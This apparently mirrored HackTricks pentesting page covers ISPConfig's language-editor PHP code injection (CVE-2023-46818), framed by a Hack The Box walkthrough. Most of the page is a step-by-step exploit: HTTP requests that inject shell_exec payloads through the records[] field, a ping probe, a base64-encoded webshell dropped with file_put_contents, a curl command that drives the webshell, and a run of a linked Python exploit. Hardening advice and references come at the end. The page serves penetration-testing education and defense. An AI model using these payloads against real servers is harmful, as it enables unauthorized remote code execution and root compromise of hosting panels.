maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/ispconfig.md
HackTricks News Bot 399a99eefa Add content from: HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig... 
- Remove searchindex.js (auto-generated file)
2025-08-27 19:21:10 +00:00

108 lines
3.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ISPConfig
{{#include ../../banners/hacktricks-training.md}}
## Overview
ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.
Key default paths:
- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).
Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:
```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```
## Language editor PHP code injection (CVE-2023-46818)
- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
- Preconditions:
- Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)
- Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini`
- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context
References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.
### Manual exploitation flow
1) Open/create a language file to obtain CSRF tokens
Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`.
2) Inject PHP via records[] and save
Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:
```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...
lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```
Out-of-band test (observe ICMP):
```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```
3) Write files and drop a webshell
Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`):
```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```
Then write a simple webshell using base64 to avoid bad characters in the POST body:
```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```
Use it:
```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```
If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
### Python PoC
A ready-to-use exploit automates token handling and payload delivery:
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
Example run:
```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```
### Hardening
- Upgrade to 3.2.11p1 or later
- Disable the language editor unless strictly needed:
```
admin_allow_langedit=no
```
- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
- Enforce strong authentication for the built-in `admin` account
## References
- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
- [CVE-2023-46818 NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink